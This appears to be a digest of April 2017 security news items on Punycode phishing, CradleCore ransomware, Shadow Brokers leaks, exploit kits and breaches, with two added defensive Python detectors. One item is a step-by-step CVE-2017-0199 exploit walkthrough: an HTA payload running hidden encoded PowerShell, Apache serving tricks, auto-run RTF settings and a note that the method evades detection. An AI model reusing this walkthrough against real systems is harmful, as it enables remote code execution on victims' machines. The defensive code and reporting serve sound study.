According to Zheng, the vulnerability relies on the fact that web browsers render Punycode URLs as Unicode only when they are in one language (like only Chinese or only Japanese), but they fail if a domain name contains characters from multiple languages.
This loophole allowed the researcher to register the domain name xn--80ak6aa92e.com and bypass the protection; it is displayed as “apple.com” by all vulnerable web browsers, including Chrome, Firefox, and Opera, though Internet Explorer, Microsoft Edge, Apple Safari, Brave, and Vivaldi are not vulnerable.
Here, the xn-- prefix is known as the ‘ASCII compatible encoding’ prefix, which tells the web browser that the domain uses Punycode encoding to represent Unicode characters, and because Zheng uses the Cyrillic "а" (U+0430) rather than the ASCII "a" (U+0041), the defence approach implemented by the web browser fails.
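The Punycode mechanism described above, and the same explanation in the earlier securityaffairs write-up, can be turned into a check that a mail gateway or URL filter applies before a user ever sees the address bar. The following Python is an added example, not Zheng's code or any browser's implementation: it decodes xn-- labels with the standard punycode codec, derives each letter's script from its Unicode name, and flags both the classic mixed-script case (the “аpple.com” example) and the whole-script case the PoC relies on (every letter Cyrillic, each a Latin look-alike). The look-alike table and the protected-domain list are a constructed subset, not the full Unicode confusables data.

```python
import codecs
import unicodedata

# Constructed subset of non-Latin letters whose glyphs, in common UI fonts, are
# indistinguishable from a Latin letter (the full list is Unicode's confusables.txt).
# All keys are Cyrillic except the last one, which is Greek omicron.
LATIN_LOOKALIKES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0456": "i", "\u0458": "j",
    "\u04bb": "h", "\u04cf": "l", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u03bf": "o",
}

# Constructed list of brand domains a filter wants to protect against impersonation.
PROTECTED_DOMAINS = ("apple.com", "google.com", "epic.com")


def decode_label(label: str) -> str:
    """Return the Unicode form of one hostname label ('xn--' labels carry Punycode)."""
    if label.lower().startswith("xn--"):
        return codecs.decode(label[4:].encode("ascii"), "punycode")
    return label


def script_of(ch: str) -> str:
    """Approximate a letter's script from its Unicode name, e.g. 'CYRILLIC SMALL LETTER A'."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]


def skeleton(label: str) -> str:
    """Replace every look-alike letter with the Latin letter it resembles."""
    return "".join(LATIN_LOOKALIKES.get(ch, ch) for ch in label)


def label_is_risky(label: str) -> bool:
    """True for a label that mixes scripts, or that is wholly non-Latin yet spells a Latin word."""
    letters = [ch for ch in label if ch.isalpha()]
    if not letters:
        return False
    scripts = {script_of(ch) for ch in letters}
    if len(scripts) > 1:
        return True  # mixed scripts in one label: the check browsers already performed in 2017
    # Whole-script confusable: the case a mixed-script check alone misses.
    return "LATIN" not in scripts and all(ch in LATIN_LOOKALIKES for ch in letters)


def assess(hostname: str) -> dict:
    """Decode a hostname and report whether it is a homograph risk and whom it imitates."""
    labels = [decode_label(part) for part in hostname.lower().split(".")]
    unicode_form = ".".join(labels)
    skel = ".".join(skeleton(part) for part in labels)
    impersonates = skel if skel != unicode_form and skel in PROTECTED_DOMAINS else None
    return {
        "unicode": unicode_form,
        "skeleton": skel,
        "risky": any(label_is_risky(part) for part in labels),
        "impersonates": impersonates,
    }


if __name__ == "__main__":
    for host in ("xn--80ak6aa92e.com", "xn--pple-43d.com", "xn--s7y.co", "apple.com"):
        print(host, assess(host))
```

Printing the decoded form next to the Punycode form is the same information the Firefox network.IDN_show_punycode setting surfaces to the user, only here it is available to a filter rather than to the eye.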
Zheng has reported this issue to the affected browser vendors, including Google and Mozilla in January.

[figure: fake page (top) and original Apple.com (bottom), with exactly the same URL]
While Mozilla is currently still discussing a fix, Google has already patched the vulnerability in its experimental Chrome Canary 59 and will come up with a permanent fix with the release of Chrome Stable 58, set to be launched later this month.
Meanwhile, millions of Internet users who are at risk of this sophisticated hard-to-detect phishing attack are recommended to disable Punycode support in their web browsers in order to temporarily mitigate this attack and identify such phishing domains.
Mitigation For Firefox Users (Not FIX For Chrome)
Firefox users can follow the steps below to manually apply the temporary mitigation:
Type about:config in address bar and press enter.
Type Punycode in the search bar.
The browser settings will show a parameter titled network.IDN_show_punycode; double-click it, or right-click and select Toggle, to change the value from false to true.
Unfortunately, there is no similar setting available in Chrome or Opera to disable Punycode URL conversion manually, so Chrome users have to wait a few weeks for the patched Stable 58 release.
Internet users are always advised to manually type website URLs in the address bar for important sites like Gmail, Facebook, Twitter, Yahoo or banking websites, instead of clicking any link mentioned on some website or email, to prevent against such undetectable attacks.


Who is offering the CradleCore Ransomware as source code?
18.4.2017 securityaffairs Ransomware

CradleCore ransomware is a malware offered in the underground as a source code, instead of the classic ransomware-as-a-service (RaaS) model.
According to the experts at Forcepoint, the author is offering the malware in many Tor-based crime forums as source code allowing crooks to request a customized version of the code.

The CradleCore ransomware is offered by the author as C++ source code along with the necessary PHP web server scripts and a payment panel; the malware goes for 0.35 Bitcoin (around $400), but the price is negotiable.

“Typically, ransomware is monetized by developers using the RaaS business model. If that doesn’t work, only then will the developers consider selling the source code.” reads the analysis published by Forcepoint.

“CradleCore is offered as a C++ source code with PHP server scripts and a payment panel. It started to be sold on a few Tor-based sites over two weeks ago for a negotiable price starting at 0.35 BTC (approximately 428 USD)”

According to the experts, this model of sale will lead to the development of new variants derived from CradleCore.

The ransomware is offered with a relatively complete feature set, it uses Blowfish for file encryption and allows offline encryption too.

The malicious code implements an anti-sandbox mechanism and communicates with its command and control server via a Tor2Web gateway.

Once it has infected a system, the CradleCore ransomware encrypts files and drops a ransom note on the system. When the malware encrypts the files it appends the .cradle extension to them.


Experts from Forcepoint, who analyzed the readme file, believe that the author of the malware is a developer without significant experience in malware coding.

The researchers discovered more about the author by conducting further analysis on the advertisement site for CradleCore ransomware.

“While the advertisement site for CradleCore is hosted on the dark web, the site’s Apache server status page appears to be accessible to the public. The logs appeared to show that the Apache server hosting the Onion site has a second Virtual Host (VHost) hosting a clearnet website. VHosts, to those unfamiliar, allow multiple websites to be hosted on a single machine and IP address:” reads the analysis.

“The Linode-assigned IP address hosting the clearnet site appears to be exclusive-use. Essentially, this could mean either that the server is compromised and is abused to host the CradleCore website or that the clearnet website and CradleCore belong to the same owner.

Digging around the contents of that clearnet website led us to the website owner’s personal site who appears to be working as a freelance software developer. From the information available on his personal website we managed to find his Twitter and LinkedIn account where it is indicated that he is a C++ programmer.”

Of course, this means that the owner of the clearnet site used to sell the ransomware is linked to a freelance C++ developer, but there is no proof that he is also the coder.

In conclusion, Forcepoint researchers believe the ransomware may be the first project of a novice malware developer.

“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.


Windows attacks via CVE-2017-0199 – Practical exploitation! (PoC)
18.4.2017 securityaffairs Exploit

The security expert David Routin (@Rewt_1) has detailed a step-by-step procedure to exploit the recently patched CVE-2017-0199 vulnerability, exploited in Windows attacks in the wild.
Introduction
For several days the security community has been aware, thanks to a FireEye publication, of different malware campaigns (Dridex…) leveraging CVE-2017-0199.
Several other publications were related to this vulnerability, but no working exploit was published.
After digging a while I found a way to exploit this vulnerability easily, which seems to be a bit different from the work already done by other researchers.

I decided to publish this work as Microsoft officially published a patch on April 11, 2017.

Technical background
It is possible to include OLEv2 links to existing documents.
These objects (once included) will reflect the current content of the source link once loaded in the document.
What is amazing is that if you try to include an HTA link as an OLEv2 object it will be executed once (at creation), but WinWord will return an error like:
[screenshot: WinWord error (CVE-2017-0199 1)]
The problem in this case is that the HTA file will not be persistent (to make it persistent you would have to link it with “file + create icon”, but we want to be stealthy and to have autorun, right?)
After thinking a while I started to consider how to handle a real, non-malicious OLE object link to a remote RTF file… To achieve this I had to play a little bit with the Content-Type and the DAV module in Apache to serve my file in the “proper” way expected by Microsoft Office (this will be discussed in the next sections).
From there, I have a valid embedded object link automatically updated after each opening of my document!

Next step? Modify the document at the source with my payload in HTA!?!

In this scenario, I was able to:
– Create a dynamic OLEv2 object link for a real RTF file
– Modify the RTF at the source with my payload
– Bypass the error generated if I wanted to create a direct link to HTA document

Another issue? The OLE object needed to be activated automatically!

I had much help solving all these issues by relying on the different articles in the references section! Thanks to Didier Stevens’ blog, Vincent Yiu (mainly inspired by his article), NVISO Labs, FireEye and obviously… Microsoft 🙂

Step 1

Prepare an HTA file (HTA files are HTML applications which can run JScript and VBScript).
Let’s call it “ms.hta”
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>
Step 2

Create a simple RTF document using Winword with any random content (in our example the string “This is my official and legit content”).

Call it “ms.rtf”

Step 3

Push these 2 files to a web server you have full control over.
We assume they will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
The following directives will:
– add the “Content-Type: application/rtf” header to all files in /ms
– allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
service apache2 restart

Step 4

Create a simple RTF document using Winword, “exploit.rtf”. This will be our exploit!

Insert -> Object

[screenshot: CVE-2017-0199 creation of OLEv2 external link]
After clicking OK you will get the content of the “ms.rtf” file, which just contains a random string.

Save the file as “exploit.rtf”

[screenshot: CVE-2017-0199 OLEv2 link object created]

At this step we can close Winword and go to the next step for changing the content of ms.rtf with the HTA payload…
Step 5

The following step will:
– change the ms.rtf that we have included to the custom HTA payload
– make the web server send an “application/hta” Content-Type… this will be interpreted by the Winword client, which will run mshta to handle this content type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart
Step 6

At this step, if the user opens the “exploit.rtf” file he will have to double click on the link object to launch the attack…

If we want the OLE object to be loaded automatically when the document is opened, we have to edit the exploit.rtf file and change:

to
\object\objautlink\objupdate\rsltpict……………………..

At this step the exploit is built.

Exploitation:

Once the user opens the document, the OLE object is updated through the link and mshta is executed thanks to the application/hta Content-Type delivered by the server.
Result: code is executed!

Meterpreter is here!
[screenshot: CVE-2017-0199 4]

We don’t care about the warning as the code was already executed…

[screenshot: CVE-2017-0199 exploited, warning after execution]

Detection using current AV/published YARA rules

From my personal tests it seems that this method is not currently caught by AV (Defender already has a signature for CVE-2017-0199).

Additionally, the currently published YARA rules do not match this exploit:

rule rtf_objdata_urlmoniker_http {
strings:
$header = "{\\rtf1"
$objdata = "objdata 0105000002000000" nocase
$urlmoniker = "E0C9EA79F9BACE118C8200AA004BA90B" nocase
$http = "68007400740070003a002f002f00" nocase
condition:
$header at 0 and $objdata and $urlmoniker and $http
}

Indeed, the urlmoniker string is not present in the document built this way, so this YARA rule will never trigger on it.
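To make the detection gap concrete from a defender's side, the following Python is an added illustration (it is not code from the original write-up) that re-implements the conditions of the published rtf_objdata_urlmoniker_http rule as a plain predicate and puts a complementary heuristic next to it, keyed on the \objautlink and \objupdate control words that the walk-through relies on to refresh the linked object at open time. The three sample documents are constructed inline for the demonstration; the CLSID hex and the UTF-16 "http://" string are the values quoted in the YARA rule above.

```python
"""Compare the published objdata/URL-moniker rule with a linked-object heuristic.

Added example, not part of the original post. Sample RTF bodies are constructed
here; they are minimal control-word skeletons, not real documents.
"""
import re

URLMONIKER_CLSID = "E0C9EA79F9BACE118C8200AA004BA90B"  # value from the published rule
HTTP_UTF16_HEX = "68007400740070003a002f002f00"        # "http://" as UTF-16LE hex


def matches_published_rule(data: bytes) -> bool:
    """Python rendering of rtf_objdata_urlmoniker_http: header at offset 0,
    an objdata stream header, the URL moniker CLSID and a UTF-16 "http://"."""
    lowered = data.lower()
    return (
        data.startswith(b"{\\rtf1")
        and b"objdata 0105000002000000" in lowered
        and URLMONIKER_CLSID.lower().encode() in lowered
        and HTTP_UTF16_HEX.lower().encode() in lowered
    )


# A linked object (\objautlink) flagged to refresh on open (\objupdate), inside
# the same group as the \object control word. Word resolves the link itself,
# so no moniker bytes need to appear in the RTF text.
AUTO_UPDATE_LINK = re.compile(rb"\\object[^{}]*\\objautlink[^{}]*\\objupdate")


def has_auto_updating_link(data: bytes) -> bool:
    """Heuristic: RTF header plus a linked OLE object set to auto-update."""
    return data.startswith(b"{\\rtf1") and AUTO_UPDATE_LINK.search(data) is not None


def classify(data: bytes) -> dict:
    """Run both checks so the two coverage areas can be compared side by side."""
    return {
        "published_rule": matches_published_rule(data),
        "autolink_heuristic": has_auto_updating_link(data),
    }


# Constructed sample 1: embedded object whose objdata carries a URL moniker,
# the document shape the published rule was written for.
SAMPLE_OBJDATA = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata 0105000002000000"
    + URLMONIKER_CLSID.encode()
    + HTTP_UTF16_HEX.encode()
    + b"}}}"
)

# Constructed sample 2: a linked object using the control words from the
# walk-through; no moniker CLSID or UTF-16 URL appears in the text.
SAMPLE_AUTOLINK = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\rsltpict"
    b"{\\*\\objclass Word.Document.8}"
    b"{\\*\\objdata 01050000020000000a000000}{\\result{\\pict}}}}"
)

# Constructed benign document with no OLE object at all.
SAMPLE_BENIGN = b"{\\rtf1\\ansi Quarterly report text.}"


if __name__ == "__main__":
    for name, doc in (("objdata/urlmoniker", SAMPLE_OBJDATA),
                      ("autolink/objupdate", SAMPLE_AUTOLINK),
                      ("benign", SAMPLE_BENIGN)):
        print(name, classify(doc))
```

Auto-updating linked objects also occur in legitimate documents, so the second predicate is a triage signal for sandboxing or for correlating with an outbound request for an RTF-named resource served with an unexpected content-type, not a verdict on its own.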

References

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/


Cybercriminals Steal Card Data From Shoney's Restaurants

18.4.2017 securityweek Incident
Cybercriminals managed to steal payment card data from nearly 40 Shoney’s restaurants after planting malware on their point-of-sale (PoS) systems.

Security blogger Brian Krebs learned from his sources in the financial industry that a fraud pattern had been spotted on cards used at locations of the Nashville, Tennessee-based restaurant chain. Shortly after Krebs published a blog post on Friday, Best American Hospitality Corp. confirmed that some of the Shoney's corporate affiliated restaurants it manages and operates had been hit by a data breach.

The company hired Kroll Cyber Security to investigate the incident. The security firm determined that hackers had remotely installed malware on payment processing systems at tens of Shoney’s restaurants.

The malware was designed to steal data such as cardholder name, card number, expiration date and internal verification code as it was being routed through the infected device. Investigators determined that in some cases the malware may not have obtained cardholder names.

Kroll’s investigation showed that some of the impacted locations were breached on December 27, 2016, while others were first compromised on January 11. Best American Hospitality is confident that the breach was contained by March 6.

As of last year, there were roughly 150 company-owned and franchised Shoney's restaurants across 17 U.S. states. Best American Hospitality said the breach affected 37 locations in South Carolina, Tennessee, Louisiana, Alabama, Georgia, Mississippi, Virginia, Missouri, Florida and Arkansas.

Several other major restaurant chains reported suffering data breaches in the past months, including CiCi’s, Arby’s, Wendy’s and Noodles & Company.

IHG warns of card-stealing malware at front desks

In addition to restaurants, several major hotel chains also reported being hit by card-stealing malware. One of them is InterContinental Hotels Group (IHG), which in early February confirmed that systems processing payments for bars and restaurants at 12 of the properties it manages had been compromised.

Now, IHG has informed customers that it has identified malware which may have stolen data from cards used at hotel front desks. The malware is believed to have stolen data between September 29 and December 29, 2016, but the company only received confirmation that the threat had been neutralized in February and March, when the affected properties were investigated.


CradleCore Ransomware Sold as Source Code

18.4.2017 securityweek Ransomware

The author of a new piece of ransomware is selling their creation on underground forums as source code, Forcepoint security researchers have discovered.

Dubbed CradleCore, the threat breaks from the ransomware-as-a-service (RaaS) business model that many miscreants have adopted lately, and allows “customers” to take advantage of customizable source code.

The ransomware is provided as C++ source code, paired with the necessary PHP web server scripts and a payment panel. According to Forcepoint, the malware emerged on several Tor-based sites some two weeks ago, priced at 0.35 Bitcoin (around $400) but negotiable.

Because the ransomware’s source code is sold directly, the security company expects an increase in the number of variants stemming from CradleCore.

Upon analysis, the security researchers discovered that the malware comes with “a relatively complete feature set,” as it uses Blowfish for file encryption, features anti-sandbox defenses, supports offline encryption, and uses a Tor2Web gateway (onion.link) to communicate with its command and control (C&C) server.

After infecting a system, the ransomware proceeds to encrypt user’s files and to append the .cradle extension to them. When the encryption has been completed, the malware drops a ransom note.

According to Forcepoint, some of the words used in the readme file suggest that CradleCore’s author is not a professional malware developer, but a software developer who decided to take a shot at the ransomware scene.

After tracking the advertisement site for CradleCore to a clearnet site and a Linode-assigned IP address, the security researchers concluded that the author might indeed be a freelance software developer. Information on the developer's personal website led to the author's Twitter and LinkedIn accounts, which revealed that the author is a C++ programmer.

However, all that Forcepoint can do at the moment is to “link the clearnet site with a freelance C++ developer and with an Onion site offering the CradleCore C++ source code for sale.” Thus, while they can provide a link between the owner of the clearnet site and the malware, they can’t attribute the ransomware to said developer, at least not “without knowledge of whether or not the Linode host itself has been compromised.”

“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.


Microsoft: Latest 'Shadow Brokers' Exploits Already Patched

18.4.2017 securityweek Exploit
The hacker group calling itself “Shadow Brokers” has made public another batch of files allegedly obtained from the NSA-linked threat actor tracked as the Equation Group. Microsoft has assured customers that these new exploits don’t affect up-to-date systems.

The Shadow Brokers recently published a password to a previously leaked file and many believed it would represent the group’s last dump. However, the hackers released another round of files on Friday, including exploits for Windows and IBM’s Lotus Domino platform. The leaked files also appear to show that the Equation Group breached the SWIFT banking network and monitored a number of Middle Eastern banks.

Microsoft has analyzed the latest dump and identified a dozen exploits targeting its Windows operating system. According to the company, some of the vulnerabilities leveraged by these exploits were patched back in 2008, 2009, 2010 and 2014.

Four of the exploits, dubbed EternalBlue, EternalChampion, EternalRomance and EternalSynergy, were addressed by Microsoft with the March 2017 security updates — a majority with the MS17-010 patch. The tech giant also pointed out that the remaining exploits do not work on Windows 7 and later, or Exchange 2010 and later.

Microsoft has not shared any information on how it learned about the vulnerabilities. However, experts believe the NSA itself may have disclosed the flaws to the company.

The Shadow Brokers published the names of the exploits leaked on Friday back in January, when they announced an auction for Windows tools. After seeing the list published in January, the NSA may have decided to alert Microsoft knowing that the exploits would likely be made public at some point.

Edward Snowden (@Snowden) tweeted on 15 Apr 2017: "Microsoft doesn't credit anyone for the report behind the March patch. Was it @NSAGov? If so, it was the right call. Better late than never. https://twitter.com/botherder/status/853153945677684736 …"

It’s also worth noting that Microsoft postponed its February 2017 security updates due to an unspecified “last minute issue,” and the March patches contained fixes for several of the Equation Group exploits.

While there has been a lot of speculation as to who might be behind the Shadow Brokers — some say Russia, while others believe it could be an NSA contractor — the hackers continue to claim that their main goal is to make money. They’ve had several sales strategies, including auctions and crowdfunding, but the Bitcoin address they have provided received only 10 bitcoins.

In a brief statement they published on Friday, the hackers suggested that more files could be released this week.


The failure of the missile launch by North Korea may have been caused by a US cyber attack
17.4.2017 securityaffairs CyberWar

The failed missile launch attempted by North Korea may have been thwarted by a cyber attack mounted by the US Cyber Command.
The crisis between the US and North Korea is escalating; Donald Trump warns his military may "have no choice" but to strike the rogue state.

According to The Sun, US cyber soldiers may have hacked the control system of the rocket, causing the failure of the launch.
The nuclear-capable ballistic missile exploded within five seconds of the launch; according to the newspaper, US agents used stealth malware that caused a massive malfunction.

The launch occurred near the port city of Sinpo; Kim Jong-un ordered it in defiance of President Trump, who had sent a naval task force to the region.

The US naval force in the area, led by the aircraft carrier USS Carl Vinson, is equipped with rockets capable of intercepting missiles, but they were not deployed.

It was a medium-range ballistic rocket, likely a Nodong. Experts highlighted that North Korea is forced to import the high-tech electronics used in its missiles, so it is plausible that US hackers compromised the supply chain and implanted an undetectable malware.

According to some experts, North Korea is vulnerable to cyber attacks because its scientists have to import electronic hardware.

The experts believe that US cyber units may have detected the launch and sent the instructions to the malware via satellite from the US National Security Agency headquarters in Maryland.

[Image: North Korea missile launch failed. Source: The Sun]

Fantasy or reality?

Such an attack requires a huge effort in terms of HUMINT and technical activities, but it is perfectly feasible.

“It is perfectly feasible the US brought down this missile.” said Defence analyst Paul Beaver.

“Their cyber warfare capabilities are now highly advanced.

“As soon as military satellites watching Sinpo detected an imminent launch, a team at the National Security Agency would have got to work.”

“It’s possible for them to have sent a signal directly to the missile from Maryland which effectively zapped it out of the sky.”

“North Korea has had a string of launch failures and it may be no coincidence that they have happened as the US went to cyber war.”

President Trump did not comment on Kim's missile failure.

Analysts believe that Kim will punish military commanders involved in the failed operation.

Kim has a history of punishing failure with terrible retribution, including executing his own officials with anti-aircraft guns.

Looking at North Korea's military programme, we notice a long series of technical failures; part of the intelligence community attributes these incidents to cyber attacks mounted by the US Cyber Command.

Other ballistic tests failed in recent weeks: medium-range North Korean rockets crashed and exploded.

“Last year a Musudan missile fired to mark the anniversary of the birth of Kim’s grandfather Kim Il-sung blew up so soon after take-off it wrecked its launcher.” reported The Sun.

"In November 2015 an attempt to launch a ballistic missile from a submarine ended in failure when the weapon disintegrated underwater."

"There are many things that can go wrong but it would be impossible to tell from outside if something had affected the internal guidance or control systems," said Defence analyst Lance Gatling.

“It has been openly mentioned that there is a possibility that the North’s supply chain for components has been deliberately infected, and they might never know.”


Microsoft biannual transparency report – US foreign intelligence surveillance requests more than doubled
17.4.2017 securityaffairs BigBrothers

Microsoft published its biannual transparency report: the number of US foreign intelligence surveillance requests more than doubled.
In the data shared in the biannual transparency report, the IT giant disclosed that it received more than double the number of requests under the Foreign Intelligence Surveillance Act (FISA) it had reported for the preceding six months.

Microsoft Corp announced that in the first half of 2016 it received at least a thousand surveillance requests from the US Government that sought user content for foreign intelligence purposes.

This is the highest number of requests Microsoft has listed since 2011, when it began tracking such government surveillance orders.

Privacy advocates in Congress are concerned about this increase and call for reforms to the FISA legislation in order to limit the US Government from searching American data that is incidentally collected during foreign surveillance operations.

FISA orders have to be approved by judges at the Foreign Intelligence Surveillance Court and they are usually kept secret.

"Microsoft said it received between 1,000 and 1,499 FISA orders for user content between January and June of 2016, compared to between 0 and 499 during both January-June 2015 as well as the second half of 2015." reported Reuters.

The Microsoft biannual transparency report consists of the Law Enforcement Requests Report, the U.S. National Security Orders Report and the Content Removal Requests Report.

“Microsoft received 1,000-1,499 FISA orders seeking content disclosures affecting 12,000-12,499 accounts, compared to the 0-499 FISA orders seeking disclosure of content impacting 17,500-17,999 accounts reported for the previous period.” states Microsoft. “We received 0-499 National Security Letters in the latest reporting period, which remains unchanged from the previous period.”


A portion of the FISA will expire at the end of the year unless lawmakers vote to reauthorize it.

Microsoft also released for the first time a national security letter (NSL), a sort of warrantless surveillance order used by the FBI to access the data of a customer of the company.

"As part of the release of these reports, we are also disclosing a National Security Letter (NSL) we received from the Federal Bureau of Investigation (FBI) in 2014, which sought data belonging to a customer of our consumer services." states Microsoft.

Microsoft isn't the only company that has disclosed an NSL; Twitter and Yahoo did the same in recent months under a transparency measure of the USA Freedom Act.


Terror EK rising in the threat landscape while Sundown EK drops
17.4.2017 securityaffairs Exploit

The Sundown EK has been inactive since early this year, while the Terror EK is becoming very popular in the cybercriminal ecosystem.
One year ago the Angler EK and Nuclear EK disappeared from the threat landscape, while the Sundown EK was conquering the criminal underground.

What’s happening now?

The Sundown EK has been inactive since early this year, while the Terror EK is becoming very popular in the cybercriminal ecosystem.

Last week, Cisco Talos published an analysis of Sundown EK; the experts detailed the improvements of the EK, which presented many similarities with the RIG exploit kit.

"Sundown is an exploit kit in transition, it has stopped using calling cards and other easy ways to identify its activity. It is one of the few exploit kits adding any new exploits to their arsenal, albeit stolen. At the same time they consistently steal exploits and technologies from other people and competitors." reads the analysis of the Talos group. "The exploit kit landscape has been struggling to find its footing since the major players have left. It still appears to be in transition with RIG and Sundown being the primary players left as an option for those looking to compromise random victims while browsing the web."

The Sundown EK was not as sophisticated as other large exploit kits.

Security experts at Talos noticed a long period of inactivity of the Sundown EK; variants of the kit also disappeared from the scene, including Bizarro and Greenflash.

This silence led the experts to believe that the threat actor had ceased operations.

“Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).” reads a blog post published by MalwareBytes.

“Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.”

Recently experts observed a significant increase of hacking campaigns leveraging the Terror EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a newer campaign using a different landing page that distributes the Andromeda malware.

The compromised websites are leveraged to redirect visitors to the exploit kit landing page via a server-side 302 redirect, set up through script injection.

“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.


Hacked Files Suggest NSA Penetrated SWIFT, Mideast Banks

16.4.2017 securityweek BigBrothers
Files released by the mysterious hacker Shadow Brokers suggested Friday the US National Security Agency had penetrated the SWIFT banking network and monitored a number of Middle East banks.

The files, according to computer security analysts, also showed the NSA had found and exploited numerous vulnerabilities in a range of Microsoft Windows products widely used on computers around the world.

Analysts generally accepted the files, which show someone exploiting so-called "zero-day" or hitherto unknown vulnerabilities in common software and hardware, came from the NSA.

They are believed stolen from a hyper-secret hacking unit dubbed the "Equation Group" at the key US signals intelligence agency.

"The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system," said security specialist Pierluigi Paganini on the Security Affairs website.

They "suggest the NSA was targeting the SWIFT banking system of several banks around the world."

The files appear to indicate that the NSA had infiltrated two of SWIFT's service bureaus, including EastNets, which provides technology services in the Middle East for the Belgium-based SWIFT and for individual financial institutions.

Via that entry point the agency appears to have monitored transactions involving several banks and financial institutions in Kuwait, Dubai, Bahrain, Jordan, Yemen and Qatar.

In a statement on its website EastNets rejected the allegations.

"The reports of an alleged hacker-compromised EastNets Service Bureau network is totally false and unfounded," it said.

"We can confirm that no EastNets customer data has been compromised in any way."

SWIFT said in a statement that the allegations involve only its service bureaus and not its own network.

"There is no impact on SWIFT's infrastructure or data, however we understand that communications between these service bureaus and their customers may previously have been accessed by unauthorized third parties."

"We have no evidence to suggest that there has ever been any unauthorized access to our network or messaging services."

Shadow Brokers first surfaced last year offering for sale a suite of hacking tools from the NSA. There were no takers at the price stated of tens of millions of dollars, and since then the hacker or hackers have leaked bits of the trove for free.

Analysts say many of the exploits revealed appear to be three years old or more, but have some unknown vulnerabilities that could still be used by other hackers.

No one has yet discovered the identity of Shadow Brokers, or of the hackers that gained access to the NSA materials.


Cerber Dominates Ransomware Charts

16.4.2017 securityweek Virus
Cerber, one of the most active malware families over the past year, has increased its share of the ransomware market to 87% in the first quarter of 2017, Malwarebytes Labs reports.

The threat accounted for 70% of the ransomware market in January, but increased its presence in February and March, amid a major decrease in Locky attacks, from 12% in January to less than 2% in March, Malwarebytes’ Cybercrime tactics and techniques Q1 2017 report (PDF) reads.

While Locky has been fading away, new ransomware families such as Spora and Sage have managed to grab some market share. Cerber dominates all other threats in its category at the moment, and its market domination is on par with that of the now defunct TeslaCrypt during its most popular timeframe (the first half of 2016).

Over the past several months, Cerber’s operators used a broad range of available distribution methods, ranging from exploit kits to the recently patched Apache Struts 2 vulnerability. The Kovter click-fraud Trojan was observed dropping Cerber earlier this year, after Betabot was dropping it in September 2016.

Cerber’s authors were also focused on improving their creation with the addition of machine learning evasion capabilities, and with improved anti-sandboxing functionality. Recently, Cyphort researchers noticed that Cerber was leveraging process hollowing for infection, where a suspended process is created and the ransomware’s code is injected in it.

“Just like TeslaCrypt, Cerber has risen to the top of the ransomware market, leaving all competitors in its dust. Again, like TeslaCrypt, Cerber can just as easily become yesterday’s news. However, there are a few factors at play with Cerber that could make its future different than that of families like TeslaCrypt and Locky,” Malwarebytes Labs notes.

Cerber is available as a Ransomware as a Service (RaaS), meaning that it is readily available even to cybercriminals without coding knowledge who can get involved in the distribution operation. What's more, the malware features military-grade encryption, offline encryption, and various other features that make it attractive to miscreants.

The malware landscape has seen other changes as well during the first quarter of the year, such as the emergence of new macOS malware and backdoors, including a new ransomware dubbed FindZip. Researchers also discovered the first macro malware targeting Macs.

